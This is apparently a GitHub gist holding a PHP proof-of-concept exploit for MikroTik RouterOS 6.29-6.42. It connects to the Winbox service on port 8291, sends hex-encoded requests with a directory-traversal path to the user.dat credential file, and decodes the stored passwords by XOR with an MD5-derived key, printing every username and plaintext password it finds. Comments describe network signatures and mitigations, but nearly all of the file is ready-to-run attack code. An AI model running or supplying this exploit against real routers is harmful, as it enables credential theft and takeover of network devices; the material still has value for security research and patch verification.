
@vibbow
Last active August 1, 2020 12:05
RouterOS 6.29-6.42 直接读取密码的 POC
<?php
// Proof-of-concept from the gist: connects to a RouterOS device on TCP 8291
// (the Winbox service port), retrieves the stored credential file and decodes
// each user entry. The gist title scopes it to RouterOS 6.29-6.42.
// Defender's view: on the wire this is a TCP 8291 session carrying the "M2"
// framing used below and an ASCII path with repeated "/../" components ending
// in "flash/rw/store/user.dat"; the mitigation is running a release outside
// the range named in the title and not exposing 8291 to untrusted networks.
//
// First request. The hex decodes to an "M2"-framed message whose ASCII tail is
// a "/"- and ".."-laden path ending in "flash/rw/store/user.dat".
$payload_a = "680100664d320500ff010600ff09050700ff090701000021352f2f2f2f2f2e2f";
$payload_a .= "2e2e2f2f2f2f2f2f2e2f2e2e2f2f2f2f2f2f2e2f2e2e2f666c6173682f72772f";
$payload_a .= "73746f72652f757365722e6461740200ff88020000000000080000000100ff88";
$payload_a .= "02000200000002000000";
// Second request, also "M2"-framed; one byte of it is patched from the first
// response before it is sent (see below).
$payload_b = "3b0100394d320500ff010600ff09060100fe093502000008008000000700ff09";
$payload_b .= "040200ff88020000000000080000000100ff8802000200000002000000";
$payload_a = hex2bin($payload_a);
$payload_b = hex2bin($payload_b);
echo "Open connection" . PHP_EOL;
// Hard-coded target address and port.
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($socket, '192.168.88.1', 8291);
echo "Start session" . PHP_EOL;
socket_write($socket, $payload_a, strlen($payload_a));
echo "Receive response" . PHP_EOL;
// Fixed one-second wait, then a single read of up to 2048 bytes.
sleep(1);
$response_a = socket_read($socket, 2048);
echo "Fetch password file" . PHP_EOL;
// Byte 38 of the first reply is copied into byte 19 of the second request —
// presumably a handle or session identifier echoed back by the device; not
// confirmable from this script alone.
$payload_b[19] = $response_a[38];
socket_write($socket, $payload_b, strlen($payload_b));
echo "Receive response" . PHP_EOL;
sleep(1);
$response_b = socket_read($socket, 2048);
// =======================================
echo "===========================" . PHP_EOL;
// Skip the first 55 bytes (treated as a fixed-size header) and split the rest
// on the "M2" framing marker; the first three fragments are discarded.
$response = substr($response_b, 55);
$response_r = explode("M2", $response);
for ($i = 3; $i < count($response_r); $i++) {
// Within one record the bytes 01 00 00 21 precede the user-name field and
// 11 00 00 21 precede the password field; records lacking either are skipped.
$user_data = explode(hex2bin("01000021"), $response_r[$i]);
$pass_data = explode(hex2bin("11000021"), $response_r[$i]);
if ( ! isset($user_data[1]) || ! isset($pass_data[1])) {
continue;
}
$user_data = $user_data[1];
$pass_data = $pass_data[1];
// Both fields are length-prefixed: the byte right after the marker is the length.
$user_len = hexdec(bin2hex($user_data[0]));
$pass_len = hexdec(bin2hex($pass_data[0]));
$username = substr($user_data, 1, $user_len);
$password_enc = substr($pass_data, 1, $pass_len);
// The stored password is obscured, not hashed: it is XORed with the raw MD5 of
// the user name concatenated with a fixed string. The transform is reversible,
// so read access to user.dat is equivalent to holding the plaintext credentials.
$key = md5($username . "283i4jfkai3389");
$key = hex2bin($key);
$password = "";
// Repeating-key XOR over the stored bytes.
for ($o = 0; $o < strlen($password_enc); $o++) {
$byte = $password_enc[$o];
$xor = ($key[$o % strlen($key)]);
$password .= ($byte ^ $xor);
}
// Keep only the part before the first NUL byte.
$password = explode(hex2bin("00"), $password)[0];
echo "Username: {$username}" . PHP_EOL;
echo "Password: {$password}" . PHP_EOL;
}